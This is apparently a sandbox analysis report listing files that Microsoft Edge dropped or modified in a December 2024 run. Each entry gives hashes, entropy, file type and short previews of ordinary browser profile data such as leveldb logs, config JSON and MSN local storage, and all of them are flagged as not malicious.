                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1.P..q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379538507720676..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):313
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.152000266711855
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NBq1N723oH+Tcwtk2WwnvB2KLlbI4q2PN723oH+Tcwtk2WwnvIFUv:yaYebkxwnvFL64vVaYebkxwnQFUv
                                                                                                                                                                                                                                                                                                        MD5:1B00ADEB5DF709C03F6C241B83B8EE13
                                                                                                                                                                                                                                                                                                        SHA1:652EA4B86458D318A92F84BBA05D78DCD5E15148
                                                                                                                                                                                                                                                                                                        SHA-256:04447491454548850AFD0EC03D21878074E3D5DACB79256FABBDFDBFCB18666D
                                                                                                                                                                                                                                                                                                        SHA-512:842E665C1D6E6C3557CACB36EEA0C79FF2F2B22C749409504D6FE5071C8FE43BC91F1875E940DA6226A26952A711126EFDE1297D1C9833CCA5DBD1458F1C937D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:24.171 790 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/24-13:28:24.216 790 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):358860
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.324606766763443
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Ra:C1gAg1zfvi
                                                                                                                                                                                                                                                                                                        MD5:89689A5BACC6BCA1624E2166C9D49053
                                                                                                                                                                                                                                                                                                        SHA1:A8A6629D837E86D60995D44F7CDE41F3AB1D3243
                                                                                                                                                                                                                                                                                                        SHA-256:BCEA93792E008533692D815767A1174AE6878AE147F6CD5DDDB2E423CACD43CF
                                                                                                                                                                                                                                                                                                        SHA-512:7DAC490312990BBE6C0A25B1EF483E0BB3FB3BCF3A3E06DFF5D7E5FDD809BFCDBB65FCC0E6ADD014F5F1CC6E94F9A13BB3F638CC6CE9D03B8D28ACD16F9F98BA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                        MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                        SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                        SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                        SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.188975663271872
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXnjyq2PN723oH+Tcwt8aPrqIFUt8EXn11Zmw+EXnjRkwON723oH+Tcwt8amLJ:ZjyvVaYebL3FUt8KX/+KjR5OaYebQJ
                                                                                                                                                                                                                                                                                                        MD5:C274A33FE7442A14BECA1DE27FBD12CE
                                                                                                                                                                                                                                                                                                        SHA1:222B61CFBF2F42E553538929CD8F49292D2FA2F3
                                                                                                                                                                                                                                                                                                        SHA-256:19987FF2DE07FD2176B3C99F7079B220EE89494AE5C5E0A436F53475EB30FE77
                                                                                                                                                                                                                                                                                                        SHA-512:9C8B863CCF88FB3FAB58D35CAAA258B7333B5F991DEC4D53F5EED3BCD52759A03FD24028957A89B02FA28CDB346D443B51B14E033B9CA1E0CEC1868DB99D6269
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:19.716 1be4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/24-13:28:19.716 1be4 Recovering log #3.2024/12/24-13:28:19.716 1be4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):332
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2362815603898305
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXjSIaq2PN723oH+Tcwt865IFUt8EXjSITZmw+EXjSIJkwON723oH+Tcwt86+ULJ:ZivVaYeb/WFUt8Kr/+Kh5OaYeb/+SJ
                                                                                                                                                                                                                                                                                                        MD5:E13B2B401A8DDB86D2768DB74EF1D79E
                                                                                                                                                                                                                                                                                                        SHA1:F09A9DB76FF9E94071F8A5458511362FC8147404
                                                                                                                                                                                                                                                                                                        SHA-256:62DB4549CC486B1B4511BD0DCB75152CEEDFA354D6F8ED7B516661CAA2B97F41
                                                                                                                                                                                                                                                                                                        SHA-512:77E31BA563A56CC9768464A9FD37E9005B381B4DB9A390334E08A31F3F3DA7FBB6905A2A1F0EAB30AB08DAA32619412123FCDD57EB231862BCE927AD4F1F1849
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:19.757 1b84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/24-13:28:19.757 1b84 Recovering log #3.2024/12/24-13:28:19.757 1b84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1254
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                        MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                        SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                        SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                        SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.14883001935007
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:N4ppQyq2PN723oH+Tcwt8NIFUt8E4ppG1Zmw+E4ppQRkwON723oH+Tcwt8+eLJ:aVvVaYebpFUt8nG1/+nI5OaYebqJ
                                                                                                                                                                                                                                                                                                        MD5:0DB3A25B179BB7E04B7B1F19E554EE0D
                                                                                                                                                                                                                                                                                                        SHA1:F9A43D51D7EB5D16260471ECA1ACC223E665B504
                                                                                                                                                                                                                                                                                                        SHA-256:A2594DA54E95A292BDEE4CC067FF973E111BF4D332F375B4BC0BB581640DBD23
                                                                                                                                                                                                                                                                                                        SHA-512:AFF2AC3E973F830B2927642231123E9F3E93B8188C7EC2B4798E65EF928619DC6DA707EB0632C961E5B021EECCC8714C45DF7323ABA9DC02BE15751E05525108
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.907 1b70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/24-13:28:20.907 1b70 Recovering log #3.2024/12/24-13:28:20.907 1b70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):429
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                        MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                        SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                        SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                        SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):115717
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                        MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                        SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                        SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                        SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.647765064718782
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:384:aj9P0oP/KbtfjlgQkQerGc7gam6IThj773pLLRKToaAu:adnP/ylge2pajF7NRKcC
                                                                                                                                                                                                                                                                                                        MD5:95E3DB17726EF29867B77AEC1E3A4CF9
                                                                                                                                                                                                                                                                                                        SHA1:9C443F1977D2A8E2712B2E54EC08290724B17998
                                                                                                                                                                                                                                                                                                        SHA-256:DF9A502211B87B3A07FB4A47CE44B449D7CA28DD1F79ADC993DEBABEEA5BBC31
                                                                                                                                                                                                                                                                                                        SHA-512:968A1E32269D2BC915B6D791999A56927F41B829D69441803B095E9293C7CF9DA2A802D60091A6BF78FF0C1FA85011814C89B8F3C6B973F4D2CEB5C89D21B568
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):409
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.237622002992284
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:UBvVaYeb8rcHEZrELFUt8z8/+z95OaYeb8rcHEZrEZSJ:qVaYeb8nZrExg8ZOaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                        MD5:CCB9AD144C79B2887AB37EC2181E4CC7
                                                                                                                                                                                                                                                                                                        SHA1:491D885EB7C509B10FE37F8E9DECD9CFD1A75265
                                                                                                                                                                                                                                                                                                        SHA-256:B10602F7E7D819272D994E9463B8393C818B33D934A013EF1FE4A4A915916847
                                                                                                                                                                                                                                                                                                        SHA-512:D9F0AE6361714DD352EAEEC199DC4542A222360D902E6821750B7FD0D05B927891B4A3995649EB81C44707478D3814578A5558BCB4917A89DE9C1FB497DB5B97
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:23.205 db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/24-13:28:23.205 db8 Recovering log #3.2024/12/24-13:28:23.206 db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1041
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.608527730409058
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:VTlW1QYMz7lsoP1dOn5pYRo3YInWY14YOzHb6q0OSLUYlMRE8+RqIeureF33Z+7N:VZWWla5XWrXZjWpV03y1x4fMyG
                                                                                                                                                                                                                                                                                                        MD5:F38BD0E5233BB38BE6E8B62CD9DCF201
                                                                                                                                                                                                                                                                                                        SHA1:4AEAA1250C693A282D8E30440C7DE4F92FD470A5
                                                                                                                                                                                                                                                                                                        SHA-256:CCB698A1E165AB007496933E083CAB35E8DD6D846BA74561437E3898158AEA6F
                                                                                                                                                                                                                                                                                                        SHA-512:668FCDE20365170DA9F9D4A20AA2B87DFCD06177CA4D89323AE105E842B415F9EF7DE6BE2A93632CD6946E9FA66945990C07F9DA14FC1E3BA4821A6B8C7C5618
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:~.';.................VERSION.1..META:https://ntp.msn.com.............!_https://ntp.msn.com..LastKnownPV..1735064914404.-_https://ntp.msn.com..LastVisuallyReadyMarker..1735064915300.._https://ntp.msn.com..MUID!.302665E99E416E3C182470B69FCB6F6B.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1735064914480,"schedule":[9,-1,-1,30,-1,-1,18],"scheduleFixed":[9,-1,-1,30,-1,-1,18],"simpleSchedule":[29,20,50,10,51,46,22]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1735064914359.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Tue Dec 24 2024 13:28:33 GMT-0500 (Eastern Standard
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):337
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.13922699530752
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NWR3q2PN723oH+Tcwt8a2jMGIFUt8EWJZmw+EW3kwON723oH+Tcwt8a2jMmLJ:0R3vVaYeb8EFUt8/J/+/35OaYeb8bJ
                                                                                                                                                                                                                                                                                                        MD5:4D9389D404C92BD198826D1AB206C9B5
                                                                                                                                                                                                                                                                                                        SHA1:D662F10CF5028559948DE9D82085AF07B99ADE48
                                                                                                                                                                                                                                                                                                        SHA-256:7FE6383274BB60FF4E09EA230B88A7873A7F7DDDA56893B234AD650960F07DDD
                                                                                                                                                                                                                                                                                                        SHA-512:D89963D26B04A8B8C757B1D889AFA2C9AE0723C6E4357AC91C028F3554A32C16D167FDCECD89F44A61FBC4D5C64BF550A4A1A77444704468E1B3BCA2E32D30A5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.054 b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/24-13:28:20.055 b90 Recovering log #3.2024/12/24-13:28:20.059 b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.785172024931222
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:te+AuHFpoxLnqiAC4xnxhkHtSGvx0PXgathm8jLdo4XckO0L/ZJV8Y:tTlp414xxaHtdJ0PXgF8NFXcf0L/ZJVb
                                                                                                                                                                                                                                                                                                        MD5:78B71B37A8B7CEF55725B9B267B9E2F6
                                                                                                                                                                                                                                                                                                        SHA1:E1E16CFCEC530DEFA402B36DFED54979E39ECB5B
